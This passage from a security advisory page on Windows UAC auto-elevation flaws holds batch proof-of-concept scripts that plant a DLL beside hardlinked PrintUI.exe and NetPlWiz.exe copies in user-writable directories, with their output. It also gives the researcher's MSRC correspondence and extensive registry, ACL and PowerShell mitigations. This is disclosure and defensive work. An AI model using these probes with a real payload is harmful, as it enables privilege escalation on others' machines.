            ERASE "%~?\NetPlWiz.dll"
            ERASE "%~?\NetPlWiz.exe"))
    ERASE "%ProgramData%\NetPlWiz.dll"
    ERASE "%ProgramData%\NetPlWiz.exe"
    ERASE "%ProgramData%\NetPlWiz.tmp"

Output:

    1 file(s) copied.
    0x0 (WIN32: 0 ERROR_SUCCESS) -- 0 (0)
    Error message text: The operation completed successfully.
    CertUtil: -error command completed successfully.
    1 file(s) copied.
    0xc0000139 (NT: 0xc0000139 STATUS_ENTRYPOINT_NOT_FOUND) -- 3221225785 (-1073741511)
    Error message text: {Entry Point Not Found} The procedure entry point %hs could not be located in the dynamic link library %hs.
    CertUtil: -error command completed successfully.
    Hardlink created for C:\Windows\Tasks\NetPlWiz.dll <<===>> C:\ProgramData\NetPlWiz.dll
    Hardlink created for C:\Windows\Tasks\NetPlWiz.exe <<===>> C:\ProgramData\NetPlWiz.exe
    […]
    Hardlink created for C:\Windows\Temp\NetPlWiz.dll <<===>> C:\ProgramData\NetPlWiz.dll
    Hardlink created for C:\Windows\Temp\NetPlWiz.exe <<===>> C:\ProgramData\NetPlWiz.exe
    Could Not Find C:\Windows\Temp\NetPlWiz.dll
    Could Not Find C:\Windows\Temp\NetPlWiz.exe
    […]

The exit code STATUS_ENTRYPOINT_NOT_FOUND after step 2 proves that the copied NetPlWiz.exe loaded the planted NetPlWiz.dll from its own (untrusted) directory: ShUnimpl.dll exports none of the functions NetPlWiz.exe imports.

    REM Copyright © 2011-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
    TITLE Step 1: PrintUI.exe shows a (yellow) UAC prompt when started in an untrusted directory
    COPY /Y "%SystemRoot%\System32\PrintUI.exe" "%PUBLIC%\PrintUI.exe"
    START "Oops!" /WAIT "%PUBLIC%\PrintUI.exe"
    "%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%
    TITLE Step 2: PrintUI.exe loads an arbitrary PrintUI.dll from an untrusted directory
    COPY /Y "%SystemRoot%\System32\ShUnimpl.dll" "%PUBLIC%\PrintUI.dll"
    START "Ouch!" /WAIT "%PUBLIC%\PrintUI.exe"
    "%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%
    TITLE Step 3: PrintUI.exe auto-elevates and loads an arbitrary PrintUI.dll
    COPY /Y NUL: "%PUBLIC%\PrintUI.log"
    DIR "%SystemRoot%" /A:D /B /S 1>"%PUBLIC%\PrintUI.tmp"
    FOR /F "Delims= UseBackQ" %? IN ("%PUBLIC%\PrintUI.tmp") DO @(
        MKLINK /H "%~?\PrintUI.dll" "%PUBLIC%\PrintUI.dll" 2>NUL: && (
            MKLINK /H "%~?\PrintUI.exe" "%PUBLIC%\PrintUI.exe"
            START "BOOM?" /WAIT "%~?\PrintUI.exe"
            ECHO !ERRORLEVEL! %~? 1>>"%PUBLIC%\PrintUI.log"
            ERASE "%~?\PrintUI.dll"
            ERASE "%~?\PrintUI.exe"))
    ERASE "%PUBLIC%\PrintUI.dll"
    ERASE "%PUBLIC%\PrintUI.exe"
    ERASE "%PUBLIC%\PrintUI.tmp"

Output:

    1 file(s) copied.
    The operation completed successfully.
    1 file(s) copied.
    A dynamic link library (DLL) initialization routine failed.
    Hardlink created for C:\Windows\Tasks\PrintUI.dll <<===>> C:\Users\Public\PrintUI.dll
    Hardlink created for C:\Windows\Tasks\PrintUI.exe <<===>> C:\Users\Public\PrintUI.exe
    […]
    Hardlink created for C:\Windows\Temp\PrintUI.dll <<===>> C:\Users\Public\PrintUI.dll
    Hardlink created for C:\Windows\Temp\PrintUI.exe <<===>> C:\Users\Public\PrintUI.exe
    Could Not Find C:\Windows\Temp\PrintUI.dll
    Could Not Find C:\Windows\Temp\PrintUI.exe
    […]

The same test as a batch file for an arbitrary auto-elevating application: save it on the system drive (hardlinks need the same volume) under the name of the application, for example NetPlWiz.cmd, and run it; it copies %SystemRoot%\System32\‹application›.exe next to itself and probes the directories below %ProgramData%\, the Program Files directories and %SystemRoot%\:

    REM Copyright © 2011-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
    IF /I NOT "%SystemDrive%" == "%~d0" EXIT /B
    COPY "%SystemRoot%\System32\%~n0.exe" "%~dpn0.exe"
    IF ERRORLEVEL 1 EXIT /B
    START "OOPS!" /WAIT "%~dpn0.exe"
    "%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%
    COPY "%SystemRoot%\System32\ShUnimpl.dll" "%~dpn0.dll"
    IF ERRORLEVEL 1 EXIT /B
    START "OUCH!" /WAIT "%~dpn0.exe"
    "%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%
    COPY NUL: "%~dpn0.log"
    IF ERRORLEVEL 1 EXIT /B
    REM Top-level directories of %ProgramData% with full pathnames (DIR /B without /S
    REM would print bare names, which the hardlinks below could not resolve)
    (FOR /D %%? IN ("%ProgramData%\*") DO @ECHO %%~?) 1>"%~dpn0.tmp"
    DIR "%ProgramFiles%" /A:D /B /S 1>>"%~dpn0.tmp"
    IF DEFINED ProgramFiles(x86) IF NOT "%ProgramFiles(x86)%" == "%ProgramFiles%" (
        DIR "%ProgramFiles(x86)%" /A:D /B /S 1>>"%~dpn0.tmp")
    DIR "%SystemRoot%" /A:D /B /S 1>>"%~dpn0.tmp"
    SETLOCAL ENABLEDELAYEDEXPANSION
    FOR /F "Delims= UseBackQ" %%? IN ("%~dpn0.tmp") DO @(
        MKLINK /H "%%~?\%~n0.exe" "%~dpn0.exe" 2>NUL: && (
            MKLINK /H "%%~?\%~n0.dll" "%~dpn0.dll"
            START "BOOM?" /WAIT "%%~?\%~n0.exe"
            ECHO !ERRORLEVEL! %%~? 1>>"%~dpn0.log"
            ERASE "%%~?\%~n0.dll"
            ERASE "%%~?\%~n0.exe"))
    ERASE "%~dpn0.dll"
    ERASE "%~dpn0.exe"
    ERASE "%~dpn0.tmp"
    EXIT /B

MSRC CASE 39303

I reported the vulnerability introduced by the Common Language Runtime of the .NET Framework to the MSRC, where case number 39303 was assigned. They replied with the following statement:

> UAC is not a security boundary. As such, this does not meet the bar for an
> explicit down level fix.
OUCH: this vulnerability is in the Common Language Runtime of the .NET Framework, not in User Account Control, which can be bypassed due to it, though!

Note: User Account Control was announced and introduced as core security component, though:

> User Account Protection was the preliminary name for a core security component
> of Windows Vista. The component has now been officially named User Account
> Control (UAC).

What’s the worth of a core security component that can be bypassed due to careless or clueless implementation of another component? What about defense in depth or trustworthy computing?

MSRC CASE 64957

I reported the vulnerability introduced by the user-writable directories to the MSRC, where case number 64957 was assigned. They replied with the following statement:

> Thank you again for your research and report. Our analyst has completed their
> review of your report regarding color coded UAC prompts. We were able to
> reproduce the issue as you reported it, but this issue would not meet our bar
> for immediate servicing with a Patch Tuesday security update. Issues involving
> UAC typically do not meet the bar per our servicing criteria published here -
> https://aka.ms/windowscriteria, as we don't consider UAC a hard security
> boundary, but rather, a customizable enhancement to assist in making security
> accessible to all users from home consumers to enterprise customers.
>
> I will be closing this case, but we have notified the UAC team, and this is
> something that they may consider for a future release of Windows. We
> appreciate the opportunity to review your research, and please don't hesitate
> to send us any additional findings at https://aka.ms/secure-at.

Ouch: the vulnerability is not the color code of the UAC prompt, but that auto-elevation is performed in untrusted directories, with vulnerable applications, without UAC prompt!
What’s the worth of a core security component that can simply be bypassed by granting unprivileged users write permission in directories beyond the system directory, due to careless and clueless implementation of the applications that depend on it? What about defense in depth or trustworthy computing?

MITIGATIONS

With the mitigations presented here an unprivileged process or user can still execute CompMgmtLauncher.exe and EventVwr.exe, but they run with the unprivileged process’ or user’s credentials, not elevated; when they launch %SystemRoot%\System32\CompMgmt.msc or %SystemRoot%\System32\EventVwr.msc, elevation is handled during start of %SystemRoot%\System32\MMC.exe.

Note: the mitigations are designed for and have been tested on Windows 7; their adaptation to newer versions of Windows NT is left as an exercise to the reader.

MITIGATION AGAINST EXPLOITATION OF COMPMGMTLAUNCHER.EXE

Replace the command line of the Computer Management context menu entry of the Computer icon, which launches the superfluous CompMgmtLauncher.exe, and additionally inhibit its elevation:

    ; Copyright © 2016-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
    ; %16421% is the INF directory identifier of %SystemRoot%\System32\ (16384 + CSIDL_SYSTEM).
    ; Flag 32 = FLG_ADDREG_OVERWRITEONLY replaces only an existing command line,
    ; flag 2 = FLG_ADDREG_NOCLOBBER leaves an existing compatibility layer entry untouched.

    [Version]
    Provider  = "Stefan Kanthak"
    Signature = "$Windows NT$"

    [DefaultInstall]
    AddReg = Registry

    [Registry]
    HKCR,"CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\Shell\Manage\Command",,32,"%16421%\MMC.exe %16421%\CompMgmt.msc"
    HKCR,"Launcher.Computer\Shell\Manage\Command",,32,"%16421%\MMC.exe %16421%\CompMgmt.msc"
    HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\CompMgmtLauncher.exe",2,"RunAsInvoker"

Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!
Note: always specify complete command lines in Registry entries, not just the name of a data or script file, and always use fully qualified pathnames!

MITIGATION AGAINST EXPLOITATION OF EVENTVWR.EXE

Replace the command line of the verb Open for Event Log files, which launches the superfluous EventVwr.exe, and additionally inhibit its elevation:

    ; Copyright © 2009-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
    [Version]
    Provider = "Stefan Kanthak"
    Signature = "$Windows NT$"
    [DefaultInstall]
    AddReg = Registry
    [Registry]
    HKCR,"evtfile\Shell\Open\Command",,32,"%16421%\MMC.exe %16421%\EventVwr.msc /L:""%L"""
    HKCR,"evtxfile\Shell\Open\Command",,32,"%16421%\MMC.exe %16421%\EventVwr.msc /L:""%L"""
    HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\EventVwr.exe",2,"RunAsInvoker"

Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Note: always specify complete command lines in Registry entries, not just the name of a data or script file, and always use fully qualified pathnames!

MITIGATIONS AGAINST EXPLOITATION OF .NET FRAMEWORK PROFILER

Use an unprivileged Standard User account! Additionally use AppLocker or Software Restriction Policies alias SAFER to deny execution of DLLs from user-writable directories.

MITIGATIONS AGAINST EXPLOITATION OF HTML HELP

Use an unprivileged Standard User account! Additionally use AppLocker or Software Restriction Policies alias SAFER to deny execution of DLLs from user-writable directories.
MITIGATIONS AGAINST EXPLOITATION OF VULNERABLE SHORTCUTS IN THE START MENU

Replace the command line of the shortcuts:

    ; Copyright © 2009-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
    [Version]
    Provider = "Stefan Kanthak"
    Signature = "$Windows NT$"
    [DefaultInstall]
    ProfileItems = Shortcut
    [Shortcut]
    CmdLine = 16421,,"MMC.exe %16421%\TaskSchd.msc"
    ;HotKey =
    IconIndex = 1
    IconPath = 16421,,"MIGUIResource.dll"
    InfoTip = "@%16421%\MIGUIResource.dll,-202"
    Name = "Task Scheduler",0
    SubDir = "Accessories\System Tools"
    ;WorkingDir = 16421,

Note: creation of safe shortcuts to the various other *.msc found in the directory %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ is left as an exercise to the reader.

Note: always specify complete command lines in shortcuts, not just the name of a data or script file, and always use fully qualified pathnames!

MITIGATION AGAINST EXPLOITATION OF WUSA.EXE

Inhibit its elevation:

    ; Copyright © 2009-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
    [Version]
    Provider = "Stefan Kanthak"
    Signature = "$Windows NT$"
    [DefaultInstall]
    AddReg = Registry
    [Registry]
    HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\WUSA.exe",2,"RunAsInvoker"

Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!
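The RunAsInvoker compatibility layer is the common mechanism of the mitigations for CompMgmtLauncher.exe, EventVwr.exe and WUSA.exe above (and for MSHTA.exe, CScript.exe and WScript.exe, which the next section handles the same way). The following PowerShell script is an added example, not code from UACAMOLE.INF or from this page's author: it sets that layer for all six executables and covers the AMD64 case the page leaves as an exercise, writing the native (64-bit) and the WOW64 (32-bit) Registry views through an explicit RegistryView instead of naming WoW6432Node. Assumptions: Windows PowerShell 3.0 or later (needed for Microsoft.Win32.RegistryView), run elevated in the native execution environment; the 32-bit view is written for the copies in %SystemRoot%\SysWOW64 so that 32-bit callers see the layer as well. Unlike the INF entries, whose flag 2 (FLG_ADDREG_NOCLOBBER) leaves an already existing Layers value untouched, this example merges into an existing value and drops the layers that would re-enable elevation.

```powershell
# Added example, not part of UACAMOLE.INF: set the RunAsInvoker compatibility
# layer for the auto-elevating executables named on this page, in both the
# native (64-bit) and the WOW64 (32-bit) Registry views, without ever naming
# WoW6432Node. Assumptions: Windows PowerShell 3.0+, run elevated and in the
# native execution environment.

$LayersKey = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers'

function Add-RunAsInvokerLayer {
    param(
        [Parameter(Mandatory = $true)][string]$ExePath,
        [Parameter(Mandatory = $true)][Microsoft.Win32.RegistryView]$View
    )
    # OpenBaseKey with an explicit view is the supported way to reach the
    # 32-bit or the 64-bit hive; the Registry redirector, not the caller,
    # maps the 32-bit view to WoW6432Node.
    $hklm = [Microsoft.Win32.RegistryKey]::OpenBaseKey(
        [Microsoft.Win32.RegistryHive]::LocalMachine, $View)
    try {
        $key = $hklm.CreateSubKey($LayersKey)
        try {
            # The value is a space-separated list of layer names: keep the
            # layers already present, drop the ones that would (re)enable
            # elevation, then add RunAsInvoker exactly once.
            $existing = [string]$key.GetValue($ExePath, '')
            $tokens = @($existing -split ' ' | Where-Object { $_ })
            $tokens = @($tokens | Where-Object {
                ('RunAsAdmin', 'RunAsHighest', 'RunAsInvoker') -notcontains $_ })
            $tokens += 'RunAsInvoker'
            $key.SetValue($ExePath, ($tokens -join ' '),
                [Microsoft.Win32.RegistryValueKind]::String)
            return ('{0} [{1}] = {2}' -f $ExePath, $View, $key.GetValue($ExePath))
        } finally { $key.Close() }
    } finally { $hklm.Close() }
}

# The executables whose elevation the mitigations on this page inhibit.
$Exes = 'CompMgmtLauncher.exe', 'EventVwr.exe', 'WUSA.exe',
        'MSHTA.exe', 'CScript.exe', 'WScript.exe'

foreach ($exe in $Exes) {
    # Native copy in %SystemRoot%\System32; on 32-bit Windows the 64-bit view
    # simply maps to the one and only view.
    Add-RunAsInvokerLayer -ExePath "$env:SystemRoot\System32\$exe" -View Registry64

    # 32-bit copy in %SystemRoot%\SysWOW64 (assumption: same file name),
    # registered in the 32-bit view; absent on 32-bit Windows.
    $wow = "$env:SystemRoot\SysWOW64\$exe"
    if (Test-Path -LiteralPath $wow) {
        Add-RunAsInvokerLayer -ExePath $wow -View Registry32
    }
}
```

Each call returns the resulting value, so the output doubles as the check that the layer was written where intended; compare it with what the 32-bit and the 64-bit regedit.exe show for the Layers key.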
MITIGATION AGAINST EXPLOITATION OF MSHTA.EXE, CSCRIPT.EXE AND WSCRIPT.EXE

Inhibit their elevation:

    ; Copyright © 2009-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
    [Version]
    Provider = "Stefan Kanthak"
    Signature = "$Windows NT$"
    [DefaultInstall]
    AddReg = Registry
    [Registry]
    HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\MSHTA.exe",2,"RunAsInvoker"
    HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\CScript.exe",2,"RunAsInvoker"
    HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\WScript.exe",2,"RunAsInvoker"

Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

MITIGATIONS AGAINST COMPOUND VULNERABILITIES

Use an unprivileged Standard User account!

Set the UAC slider to its highest position, titled Always notify:

    REGEDIT4

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
    "ConsentPromptBehaviorAdmin"=dword:00000002
    ;"ConsentPromptBehaviorUser"=dword:00000000

Additionally deny execution (for unprivileged users) in all user-writable subdirectories below %SystemRoot%\, for example via AppLocker or Software Restriction Policies alias SAFER.
Finally remove the permission for unprivileged users (really: members of the NT AUTHORITY\Authenticated Users or BUILTIN\Users groups) to create subdirectories in the root directory of the system drive:

    ICACLs.exe %SystemDrive%\ /Deny *S-1-5-32-545:(AD,WD) /Remove:d *S-1-5-32-545 /Remove:g *S-1-5-11

Disable the Diagnostics Troubleshooting Wizard:

    REGEDIT4

    [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics]
    "EnableDiagnostics"=dword:00000000

ALTERNATIVE MITIGATION

Launch an arbitrary other application instead of the superfluous CompMgmtLauncher.exe:

    ; Copyright © 2016-2022, Stefan Kanthak <stefan.kanthak@nexgo.de>
    [Version]
    Provider = "Stefan Kanthak"
    Signature = "$Windows NT$"
    [DefaultInstall]
    AddReg = Registry
    [Registry]
    HKLM,"SOFTWARE\Microsoft\Windows NT\Image File Execution Options\CompMgmtLauncher.exe","Debugger",0,"%16420%\.exe"

Download the Vulnerability and Exploit Detector SENTINEL.EXE and save it as %SystemRoot%\.exe (the DIRID 16420 denotes the directory %SystemRoot%).

Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures as well as for EventVwr.exe is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

INSTALLATION

Download the setup script UACAMOLE.INF, then right-click it to display its context menu and click Install to run the installation.

Installation requires administrative privileges and access rights.

Note: on Windows Vista and newer versions of Windows NT, InfDefaultInstall.exe, the application registered for the Install verb of *.inf files, requests administrative privileges.

Note: on systems with AMD64 alias x64 processor architecture, the installation must be run in the native (64-bit) execution environment!

UPDATE

The setup script supports the update from any previous version: just install the current version!

DEINSTALLATION

Not provided.
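The mitigations against the compound vulnerabilities above remove three preconditions: user-writable directories below %SystemRoot%\, the permission to create subdirectories in the root of the system drive, and a UAC setting below Always notify (plus the Diagnostics Troubleshooting Wizard). The following PowerShell script is an added example, not code from UACAMOLE.INF or from this page's author: a read-only audit that reports which of these preconditions are still present, so the result can be checked before and after installation. Assumptions: Windows PowerShell 3.0 or later, run elevated in the native execution environment; "unprivileged users" is taken to mean the well-known SIDs Everyone, NT AUTHORITY\Authenticated Users and BUILTIN\Users; only Allow ACEs are evaluated, a matching Deny ACE (which would take precedence) is not subtracted.

```powershell
# Added example, not part of UACAMOLE.INF: read-only audit of the conditions
# the "compound vulnerabilities" mitigations remove. Assumptions: Windows
# PowerShell 3.0+, run elevated in the native execution environment.

# Access mask bits that let a principal plant files or subdirectories:
# FILE_WRITE_DATA (0x2), FILE_APPEND_DATA alias FILE_ADD_SUBDIRECTORY (0x4),
# plus GENERIC_WRITE (0x40000000) and GENERIC_ALL (0x10000000), which
# inheritable ACEs may still carry unmapped.
$PlantMask = 0x2 -bor 0x4 -bor 0x40000000 -bor 0x10000000

# Everyone, NT AUTHORITY\Authenticated Users, BUILTIN\Users (assumption: these
# are what "unprivileged users" means for this audit).
$UnprivilegedSids = @('S-1-1-0', 'S-1-5-11', 'S-1-5-32-545')

function Get-UnprivilegedWriteAces {
    param([Parameter(Mandatory = $true)][string]$Path)
    $acl = Get-Acl -LiteralPath $Path
    # Identities as SIDs (no name lookups); inherited ACEs included.
    $rules = $acl.GetAccessRules($true, $true,
        [System.Security.Principal.SecurityIdentifier])
    foreach ($ace in $rules) {
        # PropagationFlags.InheritOnly (2): the ACE applies to children only.
        if (([int]$ace.PropagationFlags -band 2) -ne 0) { continue }
        if ($ace.AccessControlType -ne
            [System.Security.AccessControl.AccessControlType]::Allow) { continue }
        if ($UnprivilegedSids -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.FileSystemRights -band $PlantMask) -eq 0) { continue }
        # Only Allow ACEs are reported; a matching Deny ACE is not subtracted.
        [pscustomobject]@{
            Path      = $Path
            Principal = $ace.IdentityReference.Value
            Rights    = $ace.FileSystemRights
            Inherited = $ace.IsInherited
        }
    }
}

function Find-UserWritableDirectories {
    param([string]$Root = $env:SystemRoot)
    $dirs = @(Get-Item -LiteralPath $Root) +
            @(Get-ChildItem -LiteralPath $Root -Directory -Recurse -Force `
                  -ErrorAction SilentlyContinue)
    foreach ($dir in $dirs) {
        # Directories whose ACL cannot be read are skipped, not reported.
        try { Get-UnprivilegedWriteAces -Path $dir.FullName } catch { }
    }
}

# 1. user-writable directories below %SystemRoot%\: the candidates for
#    "deny execution" path rules in AppLocker or SAFER
Find-UserWritableDirectories | Sort-Object Path |
    Format-Table Path, Principal, Rights, Inherited -AutoSize

# 2. can unprivileged users still create subdirectories (AD) or files (WD)
#    in the root of the system drive? (the ICACLs command above removes that)
Get-UnprivilegedWriteAces -Path ($env:SystemDrive + '\') | Format-Table -AutoSize

# 3. UAC slider and the Diagnostics Troubleshooting Wizard policy
$system = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
'ConsentPromptBehaviorAdmin = {0} (2 = Always notify)' -f $system.ConsentPromptBehaviorAdmin

$diag = Get-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics' `
            -ErrorAction SilentlyContinue
if ($diag -and $diag.PSObject.Properties['EnableDiagnostics']) {
    'EnableDiagnostics = {0} (0 = wizard disabled)' -f $diag.EnableDiagnostics
} else {
    'EnableDiagnostics: policy not set (wizard enabled)'
}
```

Every path listed in step 1 is one that a process running with the unprivileged user's credentials can populate, i.e. exactly the kind of directory in which auto-elevation must not find anything to load or execute; an empty result for step 2 and the value 2 in step 3 mean the remaining two mitigations are in place.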
TRIVIA

UACaMole is pronounced like Whack-a-Mole.

CONTACT

If you miss anything here, have additions, comments, corrections, criticism or questions, want to give feedback, hints or tips, report broken links, bugs, deficiencies, errors, inaccuracies, misrepresentations, omissions, shortcomings, vulnerabilities or weaknesses, …: don't hesitate to contact me and feel free to ask, comment, criticise, flame, notify or report!

Use the X.509 certificate to send S/MIME encrypted mail.

Note: email in weird format and without a proper sender name is likely to be discarded!

I dislike HTML (and even weirder formats too) in email, I prefer to receive plain text. I also expect to see your full (real) name as sender, not your nickname. I abhor top posts and expect inline quotes in replies.

TERMS AND CONDITIONS

By using this site, you signify your agreement to these terms and conditions. If you do not agree to these terms and conditions, do not use this site!

* The software and the documentation on this site are provided as is without any warranty, neither express nor implied. In no event will the author be held liable for any damage(s) arising from the use of the software or the documentation.
* Permission is granted to use the current version of the software and the current version of the documentation solely for personal private and non-commercial purposes. An individual's use of the software or the documentation in his or her capacity or function as an agent, (independent) contractor, employee, member or officer of a business, corporation or organisation (commercial or non-commercial) does not qualify as personal private and non-commercial purpose.
* Without written approval from the author the software or the documentation must not be used for a business, for commercial, corporate, governmental, military or organisational purposes of any kind, or in a commercial, corporate, governmental, military or organisational environment of any kind.
* Redistribution of the software and the documentation is allowed only in unmodified form of its current version and free of charge.

DATA PROTECTION DECLARATION

This web page records no (personal) data and stores no cookies in the web browser.

The web service is operated and provided by

    Telekom Deutschland GmbH
    Business Center
    D-64306 Darmstadt
    Germany
    <hosting@telekom.de>
    +49 800 5252033

The web service provider stores a session cookie in the web browser and records every visit of this web site with the following data in an access log on their server(s):

* the (pseudonymised) IP address;
* the date and time of the request;
* the URL of the requested web page or file;
* the Referer and User-Agent HTTP headers sent by the web browser;
* the result (success or failure) of the request;
* the amount of data received and sent.

--------------------------------------------------------------------------------

Copyright © 1995–2022 • Stefan Kanthak • <stefan.kanthak@nexgo.de>